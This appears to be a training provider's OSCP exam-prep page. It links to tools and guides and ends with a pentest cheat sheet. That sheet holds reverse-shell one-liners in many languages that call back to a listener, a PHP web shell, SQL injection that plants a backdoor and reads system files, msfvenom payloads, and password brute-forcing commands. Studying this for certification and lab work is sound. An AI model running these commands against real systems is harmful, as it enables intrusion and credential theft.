Share This
Scroll Down
Back to Resources
//OSCP
OSCP

What is OSCP ? :

The Offensive Security Certified Professional is one of the most technical and most challenging certifications for information security professionals.

In order to become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam and you have 24 hours to write a report.

OSCP Syllabus :

● Getting Started with Kali Linux
● Command Line Fun
● Practical Tools
● Bash Scripting
● Passive Information Gathering
● Active Information Gathering
● Vulnerability Scanning
● Web Application Attacks
● Buffer Overflows
● Client-Side Attacks
● Locating Public Exploits
● Fixing Exploits
● File Transfers
● Antivirus Evasion
● Privilege Escalation
● Password Attacks
● Port Redirection and Tunneling
● Active Directory Attacks
● The Metasploit Framework
● PowerShell Empire
● Penetration Test Breakdown

Prerequisites

Before you decide to register for the course you need to have some experience in the following areas :

● Linux Fundamentals :
▸ File System
▸ Command Line

● TCP/IP Networking Fundamentals :
▸ TCP/IP addressing and Subnetting
▸ Understanding how network Traffic is sent & received
▸ Types of protocols and services running on them.

● Programming Languages :
▸ Bash
▸ Python

● Note Taking :
▸ Cherry Tree
▸ KeepNote

Exam Details

● You will have a total of 23 hours and 45 mins for the exam.
● You will be proctored during your exam. Webcam and screen sharing software are required.
● The exam will consist of 5 target systems that are vulnerable and can be compromised.
● You will need a minimum of 70 points or higher to pass.
● If you believe you have enough points you will have another 24 hours to write your report.
● An extra 5 points will be given if you are able to complete the lab report and the course exercises.

Restrictions :

You cannot use any of the following on the exam :

● Spoofing (IP, ARP, DNS, NBNS, etc)
● Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
● Automatic exploitation tools (e.g, browser_autopwn, SQLmap, SQLninja, jsql etc.)
● Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Exam Tips :

● Enumeration is the most important thing you can do.
● Prepare your cheat sheets, notes, tools, and exploits.
● Note Everything. ● Keep Patience, Believe in yourself and Everything will be done easily !!!

Official Support :

● Penetration Testing with Kali Linux (PEN-200) : https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-

Lab Setup

VMware Workstation or VirtualBox

● Kali Linux : https://www.kali.org/downloads/
▸ If you want to play with the custom image that is made for the course, you can find it here : https://images.offensivesecurity.com/pwk-kali-vm.7z

● Windows 7 (32bit/64bit) : https://www.microsoft.com/en-in/software-download/windows7

Getting Started with Kali Linux

● Kali Linux Revealed : https://kali.training/
● Linux Jounery : https://linuxjourney.com/
● Explain Shell : https://www.explainshell.com
● TryHackMe - Linux Fundamentals : https://tryhackme.com/module/linux-fundamentals
● TryHackMe - Linux Challenges : https://tryhackme.com/room/linuxctf

Command Line Fun

● The Linux Command Line : http://linuxcommand.org
● The Linux Command Line, 2nd Edition (Book) : https://www.amazon.in/dp/1593279523/
● RTFM - Red Team Field Manual (Book) : https://www.amazon.in/dp/1494295504
● BTFM - Blue Team Field Manual (Book) : https://www.amazon.in/dp/154101636X

Practical Tools

● Netcat
● PowerShell
● Wireshark
● Tcpdump

● Kali Linux Tools : https://tools.kali.org/tools-listing

Bash Scripting

● Bash Resource : https://hacktronian.in/resources/programming.html#bash
● Linux Command Line and Shell Scripting Bible (Book) : https://www.amazon.in/dp/111898384X

Passive Information Gathering

In Passive Information Gathering process we are collecting information about the targets using publicly available information.

● Taking Notes : https://www.sublimetext.com/
● Website Recon : Gather basic information by simply browsing the site.
● Whois Enumeration : How to Use the whois Command on Linux / https://whois.domaintools.com/
● Google Hacking : Google Dork Cheatsheet / Google Hacking Database
● Netcraft : https://www.netcraft.com/
● Recon-ng : The Recon-ng Framework - GitHub
● Open-Source Code : Search Source-code Online
● Shodan : https://www.shodan.io/
● Spyse : https://spyse.com/
● Censys : https://censys.io/
● Security Headers Scanner : https://securityheaders.com/
● SSL Server Test : https://www.ssllabs.com/ssltest/
● Pastebin https://pastebin.com/
● Email Harvesting : https://github.com/laramies/theharvester
● Social Media Tools : Gather information on target's social media accounts
● Stack Overflow : https://stackoverflow.com/
● OSINT Framework : https://osintframework.com/

Active Information Gathering

In Active Information Gathering we can gather more information about these targets by actively interacting with them. for example; Port Scanning, OS Fingerprinting, DNS, SMB, NFS, SMTP, and SNMP enumeration.

● The Official Nmap Project Guide : https://nmap.org/book/toc.html
● Nmap : https://nmap.org/
● Massscan : https://github.com/robertdavidgraham/masscan
● DNS Recon : https://github.com/darkoperator/dnsrecon

Vulnerability Scanning

● Nessus : https://www.tenable.com/products/nessus
● Sn1per : https://github.com/1N3/Sn1per
● Nexpose : https://www.rapid7.com/products/nexpose/
● Nipper : https://www.titania.com/products/nipper/
● Acunetix : https://www.acunetix.com/
● OpenVAS : https://www.openvas.org/

● Getting Started with Nessus on Kali Linux : https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux

Web Application Attacks

● Web Application Enumeration : View Page Source-code, Nmap, Nikto, DirBuster, GoBuster, Whatweb
● Burp Suite : https://portswigger.net/burp
● OWASP Top Ten : https://owasp.org/www-project-top-ten/

Buffer Overflows

● Buffer Overflows Made Easy by TCM : YouTube
● 32-Bit Windows Buffer Overflows Made Easy : veteransec.com
● Buffer Overflows for Dummies : https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
● Buffer Overflow Exploitation Megaprimer for Linux : http://www.securitytube.net/groups?operation=view&groupId=4

Client-Side Attacks

https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/

Locating Public Exploits

● Exploit-DB : https://www.exploit-db.com/
● Searchexploit : https://github.com/offensive-security/exploitdb

Fixing Exploits

Resource will be updated soon.

File Transfers

File Transfers Commands
● Transfer files from Kali to the target machine : https://awakened1712.github.io/oscp/oscp-transfer-files/

Antivirus Evasion

● Undetectable Malware : how-to-write-fully-undetectable-malware.pdf
● Tools & Techniques Used to Evade Antivirus Software : https://www.youtube.com/watch?v=VrivVd-j7Ys ● Msfvenom : Payloads
● Obfuscated Empire : https://github.com/cobbr/ObfuscatedEmpire
● WinPayloads : https://github.com/nccgroup/Winpayloads
● AVET : https://github.com/govolution/avet
● HERCULES – Payload Generator : https://github.com/EgeBalci/HERCULES
● Shellter and Shellter Pro : https://www.shellterproject.com/exclusive-features/
● Veil-Framework : https://github.com/Veil-Framework/Veil
● Unicorn : https://github.com/trustedsec/unicorn
● FatRat : https://github.com/Screetsec/TheFatRat

Privilege Escalation

● Payloads All The Things : https://github.com/swisskyrepo/PayloadsAllTheThings

● Linux :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/rebootuser/LinEnum
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
https://github.com/mzet-/linux-exploit-suggester
https://gtfobins.github.io
Linux Privilege Escalation for OSCP & Beyond! by Tib3rius

● Windows :
https://fuzzysecurity.com/tutorials/16.html
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
https://github.com/411Hall/JAWS
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://guif.re/windowseop
https://daya.blog/2018/01/06/windows-privilege-escalation/
https://absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://github.com/AddaxSoft/OSWindowsPrivEscalation/blob/master/index.md
https://github.com/frizb/Windows-Privilege-Escalation
Windows Privilege Escalation for OSCP & Beyond! by Tib3rius

Password Attacks

● Offline Password Cracking :
▸ Hashcat : https://hashcat.net/hashcat/
▸ John the Ripper : https://www.openwall.com/john/

● Online Password Cracking :
▸ Hydra : https://github.com/vanhauser-thc/thc-hydra
▸ Medusa : http://h.foofus.net/?page_id=51

● Wordlist Generators :
▸ Cewl : https://github.com/digininja/CeWL
▸ Crunch : https://tools.kali.org/password-attacks/crunch

● Wordlist :
▸ Kali Linux includes a lot of dictionary files in the /usr/share/wordlists
▸ Seclists Password Wordlist : https://github.com/danielmiessler/SecLists/tree/master/Passwords

● Online Password Hash Cracker :
https://crackstation.net/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://www.dcode.fr/hash-function#f0

Port Redirection and Tunneling

● SSH Tunneling : SSH Tunneling / Pivoting
● Proxychains : https://github.com/haad/proxychains
● SSHuttle : https://github.com/sshuttle/sshuttle
● Rinetd : https://github.com/samhocevar/rinetd
● Windows Port Forwarding : http://woshub.com/port-forwarding-in-windows/

Active Directory Attacks

● TryHackMe - Active Directory Basics : https://tryhackme.com/room/activedirectorybasicsAttacking and Defending Active Directory
Offensive Active Directory 101
Active Directory Attack.md

The Metasploit Framework

https://www.metasploit.com/
● Metasploit Unleashed : https://www.offensive-security.com/metasploit-unleashed/
● Metasploit: The Penetration Tester's Guide (Book) : https://www.amazon.in/dp/B005EI84KQ

PowerShell Empire

https://www.powershellempire.com/
● TryHackMe - Empire : https://tryhackme.com/room/rppsempire
● Learn PowerShell Empire 2 From A to Z : https://www.youtube.com/watch?v=0gHS3U9zMKI
● Getting Started with Post-Exploitation of Windows Hosts : https://null-byte.wonderhowto.com/how-to/use-powershell-empire-getting-started-with-post-exploitation-windows-hosts-0178664/
● Powershell Empire 101 : https://www.ired.team/offensive-security/red-team-infrastructure/powershell-empire-101

Penetration Test Breakdown

Resource will be updated soon.

Helpful Commands

Few Helpful Commands :

The Ultimate List of SANS Cheat Sheets :

https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/

Nmap :

● Quick TCP Scan
nmap -sC -sV -vv -oA quick 10.10.10.10

● Quick UDP Scan
nmap -sU -sV -vv -oA quick_udp 10.10.10.10

● Full TCP Scan
nmap -sC -sV -p- -vv -oA full 10.10.10.10

● Port knock
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --maxretries 0 -p $x 10.10.10.10; done

Web Scanning :

● Gobuster quick directory busting
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

● Gobuster search with file extension
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php

● Nikto web server scan
nikto -h 10.10.10.10

● Wordpress scan
wpscan -u 10.10.10.10/wp/

Port Checking :

● Netcat banner grab
nc -v 10.10.10.10 port

● Telnet banner grab
telnet 10.10.10.10 port

Netcat :

● Download netcat for windows
http://bit.ly/netcat_exe

● Sending file via netcat
nc 10.10.10.10 1234 < file.zip

● Receive file via netcat
nc -l -p 1234 > file.zip

File Transfers :

● HTTP Server
Python -m SimpleHTTPServer 80
Python3 -m http.server 80


● HTTP in reverse shell - Linux
wget 10.10.10.10/file

● HTTP in reverse shell - Windows
powershell -c "(new-objectSystem.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"

● FTP in Kali
python -m pyftpdlib -p 21 -w

● FTP in reverse shell
echo open 10.10.10.10/file.txt > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt


● Execute
ftp -v -n -s:ftp.txt

● TFTP in Kali
atftpd --daemon --port 69 /tftp

● TFTP in reverse shell
tftp -i 10.10.10.10 GET nc.exe

SSH :

● Connection (if you have password)
ssh [email protected]

● Connection (if you have ssh key)
ssh -i id_rsa [email protected]

● Create SSH Keys
ssh-keygen

● SSH Public key (. pub file) Permission
chmod 644 id_rsa.pub

● SSH Private key (id_rsa) & Authorized_Keys File Permission
chmod 600 id_rsa

● SSH Password Craking using Key :
Download sshng2john.py : Github
Get Hash : python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH
Crack Hash : john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH

● Crack SSH Password using Hydra :
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10

SSH Tunneling / Pivoting :

● Shuttle
sshuttle -vvr [email protected] 10.0.0.1/24

● Local port forwarding
ssh gateway -L local-port-to-listen:10.10.10.10:remote-port

● Remote port forwarding
ssh gateway -R remote-port-to-bind:127.0.0.1:local-port

● Dynamic port forwarding
ssh -D local-proxy-port -p remote-port 10.10.10.10

● Plink local port forwarding
plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10

SMB :

● SMB Vulnerability Scan
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vulnms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

● SMB Users & Shares Scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10

● Enum4linux
enum4linux -a 10.10.10.10

● Null connect
rpcclient -U "" 10.10.10.10

● Connect to SMB share
smbclient //MOUNT/share

SNMP :

● SNMP enumeration
snmp-check 10.10.10.10

Reverse Shells :

● Bash shell
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1

● Netcat Linux
nc -e /bin/sh 10.10.10.10 4443

● Netcat Windows
nc -e cmd.exe 10.10.10.10 4443

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

● Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

● Perl
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

● Remote Desktop
Remote Desktop for windows with share and 85% screen
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10

● PHP
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

● Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

● Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


● xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.10.10.10) on TCP port 6001.
xterm -display 10.10.10.10:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):
xhost +10.10.10.10

PHP :

● PHP command injection from GET Request
< ?php echo system($_GET["cmd"]);?>

● #Alternative
< ?php echo shell_exec($_GET["cmd"]);?>

Powershell :

● Non-interactive execute powershell file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

SQL Injection :

● sqlmap crawl
sqlmap -u http://10.10.10.10 --crawl=1

● sqlmap dump database
sqlmap -u http://10.10.10.10 --dbms=mysql --dump

● sqlmap shell
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell

● Upload php command injection file
union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

● Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

● Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -


Brute force :

● John the Ripper shadow file
unshadow passwd shadow > unshadow.db
then
john unshadow.db


● Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

● Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

● Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt

● Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

● Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

● RDP user with password list
ncrack -vv --user offsec -P passwords rdp://10.10.10.10

● SSH user with password list
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22

● FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp

MSFVenom Payloads :

● PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

● Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

● Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

● Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

● Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

● Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

● Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

● Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

● Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

● Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

● Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

● Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

● Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

● Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

● Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windowsbinaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Shell Spawning :

● TTY using Python (in reverse shell)
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'

● Put the shell in to background with Ctrl+Z
Ctrl+Z

● Examine the current terminal and STTY info and match it
echo $TERM
stty -a


echo os.system('/bin/bash')

/bin/sh -i

● Perl
exec "/bin/sh";

perl —e 'exec "/bin/sh";'

● Ruby
exec "/bin/sh"

● Lua
os.execute('/bin/sh')

● (from within IRB)
exec "/bin/sh"

● (from within vi)
:!bash

● (from within vi)
:set shell=/bin/bash:shell

● (from within nmap)
!sh

Practice Labs :

VulnHub :

List of PWK/OSCP Boxes

HackTheBox :

● IPPSEC : https://www.youtube.com/c/ippsec
● TJ_Null’s OSCP Prep : https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf

Our Paid Training :

https://hacktronian.in/services/cybersecurity-training.html

More Resources

The Journey to Try Harder: TJnull’s Preparation Guide for PWK/OSCP
How to prepare for PWK/OSCP, a noob-friendly guide
A Detailed Guide on OSCP Preparation – From Newbie to OSCP
Scund00r Passing OSCP
The Ultimate OSCP Preparation Guide, 2021

>_ Terminal
New Resources will be updated soon....

Want To Ask Anythink ?

© Hacktronian / All Rights Reserved / Policy
Get in Touch
Close